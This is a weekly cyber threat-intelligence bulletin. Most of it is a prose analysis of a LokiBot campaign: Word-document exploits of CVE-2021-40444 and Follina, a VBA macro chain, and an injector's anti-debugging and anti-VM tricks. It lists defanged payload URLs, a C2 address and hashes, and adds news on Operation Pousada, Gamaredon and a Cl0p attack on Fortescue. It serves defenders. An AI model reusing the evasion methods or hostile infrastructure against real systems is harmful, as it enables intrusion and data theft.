Intel Reports

Activity Summary - Week Ending on 20 July 2023:

• Red Sky Alliance identified 2,493 connections from new IP’s checking in with our Sinkholes
• Linode[.]com hit 39x
• 99 ‘new’ Botnets hits
• LokiBot
• Operation Pousada
• 2,146 cyber-attacks on 1 Company in India
• Armageddon
• GammaSteel
• Fortescue Iron Ore Hit

Red Sky Alliance Compromised (C2) IP’s

On 19 July 2023, Red Sky Alliance identified 2,493 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.

 Red Sky Alliance Malware Activity   

For a full black list – contact analysts: info@redskyalliance.com

Red Sky Alliance Botnet Tracker

On 19 July 2023, analysts identified 99 new IP addresses participating in various botnets (call for full .csv Blacklists, below are only a small sampling of botnet trackers).  We are currently upgrading this collection.

Keylogger IOCs available upon request. 

MALICIOUS CYBER TRENDS:

LokiBot – Below, Fortinet researchers look into the specifics of the identified documents, explore the payload they delivered, and outline the behavioral patterns exhibited by LokiBot.  This analysis aims to expose on the intricacies of this threat and increase awareness regarding its operational methods.

1^st Stage:  During May 2023, we obtained two types of Word documents for analysis. The first type featured an external link embedded within an XML file, “word/_rels/document.xml.rels,” while the second type included a VBA script that executed a macro immediately upon opening the document.[1]  Notably, both files contained a strikingly similar bait image, depicted in Figure 1.

Figure 1: The lure picture from the Word document

The Word document that targets CVE-2021-40444 contained a file “document.xml.rels”, shown in Figure 2, with an external link using MHTML (MIME encapsulation of aggregate HTML documents).  This web archive file format combines a website's HTML code and companion resources into a single file.  This link also uses Cuttly, a URL shortener and link management platform, to redirect users to the cloud file-sharing website, “GoFile.” Further analysis revealed that a file named “defrt.html” was downloaded upon accessing the link.  This file exploits the second vulnerability, CVE-2022-30190.  The content of this file and the decoded data is displayed in Figure 3.

Upon executing the payload, it initiates the download of an injector file named “oehrjd.exe” from the following URL: http[:]//pcwizard[.]net/yz/ftp/.  Detailed information regarding the execution file can be found in the subsequent section.

Figure 2: The Document.xml.rels contains a malicious external link in oleObject

Figure 3: Malicious content from “defrt.html” and decoded data

The second document was discovered towards the end of May. Upon analyzing the VBA script embedded within the Word document, as illustrated in Figure 4, the code is automatically executed due to its use of the “Auto_Open” and “Document_Open” functions.  Various arrays are decoded within the script and saved to a temporary folder under the name “DD.inf” (Figure 5).  It includes a command to create an “ema.tmp” file to store data after line 29 in the “DD.inf” file.  The data is then encoded using the “ecodehex” function and saved as “des.jpg”.  The script then uses rundll32 to load a DLL file with the function “maintst.”  Finally, it deletes all temporary, JPG, and INF files created throughout this process.

Figure 4: The VBA macro from the Word document

Figure 5: The content in “DD.inf”

The Compromised Website:  As mentioned, the VBA script creates an INF file to load a DLL.  The purpose of this DLL file, named “des.jpg,” is to download an injector from the URL “https[:]//vertebromed[.]md/temp/dhssdf[.]exe” for use in a later stage. It's worth noting that the download link doesn't belong to a typical file-sharing cloud platform or the attacker's command-and-control (C2) server.  Instead, it leverages the website “vertebromed.md,” which has been active since 2018.  The injector file, “dhssdf.exe,” was created on May 29, 2023, as shown in Figure 6.  Additionally, within the same folder, we discovered another MSIL loader named “IMG_3360_103pdf.exe,” created on May 30, 2023.   Although this file isn't directly involved in the Word document attack chain, it also loads LokiBot and connects to the same C2 IP.

Figure 6: Web page and the compromised folder

2^nd Stage – Injector:  In this section, we analyze the injector obtained from Follina (SHA256: 9eaf7231579ab0cb65794043affb10ae8e4ad8f79ec108b5302da2f363b77c93).  The injector is written in Visual Basic (VB), and we provide an overview of its basic information in Figure 7.

Figure 7: The information on the VB injector

Initially, the code extracts individual letters from predetermined strings.  These letters are then combined to form an API string, subsequently mapped to the corresponding functions illustrated in Figure 8.

Figure 8: API functions

The injector utilizes a hardcoded key to decrypt the payload, as shown in Figure 9.  The decryption process is outlined in pseudo-code in Figure 10.  The decrypted data is decompressed using the “RtlDecompressBufferEx” API and the parameter “COMPRESSION_FORMAT_LZNT1”.  The complete procedure through Python code and the partial payload is illustrated in Figure 11.

Figure 9: The key and encrypted data

Figure 10: The pseudo-code for decryption

Figure 11: The Python code and the final payload

The injector incorporates various evasion techniques, including:

• Checking the “BeingDebugged” flag of PEB (Process Environment Block)
• Utilizing the “NtGlobalFlag” to determine if the process was created by a debugger
• Verifying the existence of virtual machine paths, such as “\VMWare” and “\Oracle\virtualbox guest additions”
• Employing two calls to the “GetTickCount” API and using Sleep() to check if the time has been accelerated
• Using the “FindWindowW” function to identify the presence of specific debuggers, such as “OllyDbg,” “x64dbg”, “x32dbg”, “WindDbg,” “WinDbgFrameClass,” “ObsidianGUI,” “Soft Ice,” “ImmDbg,” “Zeta Debugger,” and “Rock Debugger”
• Checking the “ProcessDebugObjectHandle” (0x1E)

After obtaining the payload and verifying the overall environment, the injector utilizes the “VirtualAllocEx” function to allocate memory for the subsequent execution of LokiBot.

Figure 12: Assembly code for allocating memory

3^rd Stage – LokiBot:  LokiBot is specifically designed to gather sensitive information from various sources, including web browsers, FTP, email, and numerous software tools installed on the compromised system. Analyzing the C2 traffic to “95[.]164[.]23[.]2/swe/h/pin[.]php” in Figure 13, we determined that the version is 0x0012 and the notable Binary ID is “ckav[.]ru”.  As this version of LokiBot has remained unchanged since March, we will only highlight its major components and features.

Figure 13: C2 traffic caputre of LokiBot

First, the MD5 hash derived from the MachineGuid is in the end pcap, “D0BECCE5760947DD9FFD80DB”.  This hash serves as a mutex to ensure that multiple instances of LokiBot are not running simultaneously. It employs the “MoveFileExW” API to create a folder named “%APPDATA%\Roaming\576094” and a file named “47DD9F.exe” using a substring of the MD5 from MachineGuid.  The file is marked as hidden by the “SetFileAttributes” function and setting the attribute to FILE_ATTRIBUTE_HIDDEN (0x2).  The corresponding registry settings associated with LokiBot are depicted in Figure 14.

Figure 14: Registry setting

The list of targeted software names is stored in an array, and a partial list is provided in Figure 15.

Figure 15: Partial data of targeted software

Conclusion:  LokiBot is a long-standing and widespread malware active for many years. Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims.  The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.

LokiBot exploits various vulnerabilities and employs VBA macros to launch its attacks. It also leverages a VB injector to employ several techniques to evade detection or analysis.  As a result, it can bypass certain security measures and pose a significant threat to users.  To protect themselves, users should exercise caution when dealing with any Office documents or unknown files, especially those that contain links to external websites. It is essential to be vigilant and avoid clicking on suspicious links or opening attachments from untrusted sources. Additionally, keeping the software and operating systems up to date with the latest security patches can help mitigate the risk of exploitation by malware.

Figure 16: LokiBot attack chain

IOCs

C2:

95[.]164[.]23[.]2

Files:

17d95ec93678b0a73e984354f55312dda9e6ae4b57a54e6d57eb59bcbbe3c382
23982d2d2501cfe1eb931aa83a4d8dfe922bce06e9c327a9936a54a2c6d409ae
9eaf7231579ab0cb65794043affb10ae8e4ad8f79ec108b5302da2f363b77c93
da18e6dcefe5e3dac076517ac2ba3fd449b6a768d9ce120fe5fc8d6050e09c55
2e3e5642106ffbde1596a2335eda84e1c48de0bf4a5872f94ae5ee4f7bffda39
80f4803c1ae286005a64ad790ae2d9f7e8294c6e436b7c686bd91257efbaa1e5
21675edce1fdabfee96407ac2683bcad0064c3117ef14a4333e564be6adf0539
4a23054c2241e20aec97c9b0937a37f63c30e321be01398977e13228fa980f29

GLOBAL TRENDS:

Spain - A man has been arrested in Sevilla suspected of buying personal information and bank details of more than 15,000 Spanish taxpayers, as well as keeping a stash of illegal firearms.  Details of the case named Operation Pousada, were revealed on 17 July, by the Policia Nacional, following the suspect’s arrest in Sevilla.[2]

National Police officers detained a person on 11 July in Dos Hermanas (Seville) for his alleged participation in a crime of disclosure of secrets and fraud, both of a continuous nature, possession of weapons and storage of weapons of war and ammunition.  The investigation began in November 2022 when investigators became aware of several cyber-attacks on the computer systems of various public institutions such as the General Council of the Judiciary (CGPJ) and the State Tax Administration Agency, among others.  Specialist cyber-crime Officers from the General Information Police identified one of the persons responsible for the attacks. A young man with a long career in the world of cybercrime, was arrested on 31 March in Madrid.

This first suspect had developed a platform called ‘Ojo de Horus’ (Eye of Horus), where he illegally gathered the personal data of citizens which was then offered for sale to third parties.  Two months later, and after an intense investigation, a second individual was located, who together with the first suspect, had been responsible for illegally obtaining the different user credentials to carry out the cyber-attacks.

Officers discovered that the man illicitly acquired more than 15,000 thousand records with personal and banking information of Spanish taxpayers.  By using different digital identities in instant messaging applications, the suspect managed a wide network of contacts for financial gain.  One method he employed was to send an SMS to a user, in which he pretended to be a legitimate entity i.e. social network, bank, or public institution, with the aim of stealing private information or making a financial charge.  When officers mounted a raid man on the man’s home, he had a tab open and active in the browser of his laptop for a mass SMS-sending platform. He was also in possession of 24 mobile phones and 114 SIM cards ready to use.

Officers found the suspect not only had a wide network of criminal contacts in the virtual world but also had firearms in his home, which further demonstrates his high level of danger and links to common crime.  The firearms included a submachine gun, a short firearm and a shotgun were found, all of them with their respective cartridges and ready to be used. It is noteworthy that the automatic weapon, a Scorpion submachine gun, has a high firepower and is considered a weapon of war according to the current Weapons Regulations.  Indications of his lucrative illegal activities were also evidenced in that the person enjoyed a high standard of living with a large number of luxury items such as jewelry, gold pendants and watches, as well as high-end vehicles.

It was also discovered that during 2022 he disposed of crypto-assets for an amount of more than one million two hundred thousand euros through eight different bitcoin wallets.  On 13 July, the detainee was placed at the disposal of the head of the Central Court of Instruction number four of the Audiencia Nacional, which ordered his imprisonment.  The operation was conducted with the collaboration of the Provincial Information Brigade of Seville, the National Police Station of Dos Hermanas and the National Cryptologic Centre, and the National Intelligence Centre.

India - A single Indian organization suffered 2,146 cyber-attacks on average per week in the last six months, compared to 1,239 attacks per organization globally, according to a Check Point’s ‘Threat Intelligence Report 2023.’ According to the report, healthcare (4,839), followed by education and research (3,532), government/military (3,017), and insurance/legal (2,523) were the most attacked industries in India.  Globally, the second quarter (Q2) of 2023 saw an 8% surge in global weekly cyberattacks. The report noted that the education and research sector experienced the highest number of attacks per week and Africa and APAC faced the highest annual increase in weekly attacks per organization.[3]  “While the disruptive impact of the Russo-Ukrainian conflict on the cyber landscape has relatively reduced in recent months, the threat landscape has returned to a state of ‘normality.’ This new normal is characterized by an increase in cyberattacks,” the report mentioned.

Despite the conflict's effect waning effect on the cyber threat landscape, the persistence of these threats highlights the ongoing need for heightened vigilance and robust cybersecurity measures to counteract the relentless and evolving nature of cyberattacks, it added.  In addition, cybercriminals continue to leverage the latest AI revolution, by stretching the borders of generative AI chat platforms such as ChatGPT4. In Q2, one out of every 44 organizations worldwide experienced a ransomware attack, representing a decrease of 9% compared to Q2 2022.  APAC and Europe saw significant year-over-year increase in ransomware attacks per organization, with 29% and 21% increase, respectively, said the report.

Russia - The Moscow-linked hacking group known as Armageddon remains one of the most active and dangerous threat actors targeting Ukraine during its war with Russia, according to recent research.  The group, also known as Gamaredon, mostly conducts cyberespionage operations against Ukrainian security and defense services, but the group has also been linked to at least one destructive cyberattack against an unspecified information infrastructure facility, according to the Ukrainian computer emergency response team (CERT-UA).  According to an analysis from CERT-UA published last week, the group has infected thousands of government computers.  “They are even more active this year than they were last year—both in terms of malware development as well as phishing campaigns,” said a threat intelligence researcher at Slovak cybersecurity company ESET.[4]

The group is “bombarding Ukraine,” said an intelligence analyst at US cybersecurity firm Symantec. According to him, the group was apparently created solely to carry out attacks on Ukraine.  “That's highly unusual,” he said.  “It may not be the most technically sophisticated group but the combination of focus and energy does make it particularly threatening.”

Tactics and tools:  Armageddon operate from the Russian-annexed Ukrainian Crimean Peninsula and acts on orders from Russia’s Federal Security Service (FSB) in Moscow, according to cybersecurity experts.  Lately, the group has been consistently improving its tactics and rewriting its tools to evade detection, according to CERT-UA.  One of the latest techniques observed by researchers is the implementation of a USB infection technique, so if an infected drive is shared between computers the threat actor can infect new nodes, according to BlackBerry’s cyber threat intelligence team.  "It is a simple but sometimes effective way of spreading malware to more computers on a network and lengthening their intrusion times,” they said.

To gain unauthorized access to a victim’s system, Armageddon hackers mostly use phishing emails or text messages sent from previously compromised Telegram, WhatsApp, and Signal accounts, according to CERT-UA.  Once the hackers gain initial access, they typically proceed to steal files within a timeframe of 30 to 50 minutes, often using the GammaSteel malware.  This is a custom-made information stealer implant that can exfiltrate files of specific extensions, steal user credentials and take screenshots of the victim’s computer.  Hackers can re-infect a computer if at least one malicious file remains there, CERT-UA said.

Espionage and persistence:  The focus on espionage distinguishes Armageddon from other state-sponsored Russian groups, including Sandworm, which is mostly engaged in cyber sabotage.  But it also makes it harder for researchers to evaluate the impact of Armageddon’s attacks, according to CERT-UA.  “We have been detecting continuous waves of Armageddon campaigns in Ukraine and many attacks have been thwarted,” he said. 

The group mostly uses Telegram to send instructions to compromised devices, receive information from them, and coordinate their actions.  The use of Telegram helps the threat actor “fly under the radar” when communicating with the platform’s servers, which are legitimate web resources.  “For defenders, it’s generally harder to spot exfiltration and malicious communications,” they added.  Although Gamaredon has been “quite successful” in Ukraine it is still facing challenges, such as moving laterally within the infected networks.  Researchers believe the group is trying to make up for its lack of technical skills with persistence in its attacks.   “They tend to only compromise individual computers in targeted organizations, so it’s quite likely they're usually getting fragments rather than the keys to the kingdom,” he said.

Australia - The world’s fourth-largest iron ore exporter described the attack as “a low impact cyber incident” that occurred on 28 May.  The information disclosed “was not confidential in nature,” the Perth-based company said in an emailed response to inquiries.  “We notified the Australian Cyber Security Centre of the incident, and our internal investigation and remediation actions are now complete,” Fortescue said.  The Australian newspaper reported earlier this week that Russian ransomware gang C10p, also known as “Cl0p”, had claimed via a blog on the dark web that it had stolen customer data from Fortescue in a “financially motivated” attack.  The gang had not released the data and was seeking a ransom from Fortescue, the paper said, without saying when the information was posted on the blog.[5]

Iron ore is the source of primary iron for the world's iron and steel industries.  It is therefore essential for the production of steel, which in turn is essential to maintain a strong industrial base.[6] 

[1] https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros?lctg=141970831

[2] https://euroweeklynews.com/2023/07/17/15000-spanish-taxpayers-details-sold-following-cyber-attacks/

[3] https://economictimes.indiatimes.com/tech/technology/over-2000-cyber-attacks-hit-a-single-indian-firm-a-week-on-average-report/articleshow/101829518.cms

[4] https://therecord.media/armageddon-gamaredon-russian-hacking-group-increasingly-targeting-ukraine-government/

[5] https://news.yahoo.com/fortescue-hit-cyber-attack-saw-053934501.html

[6] https://www.usgs.gov/centers/national-minerals-information-center/iron-ore-statistics-and-information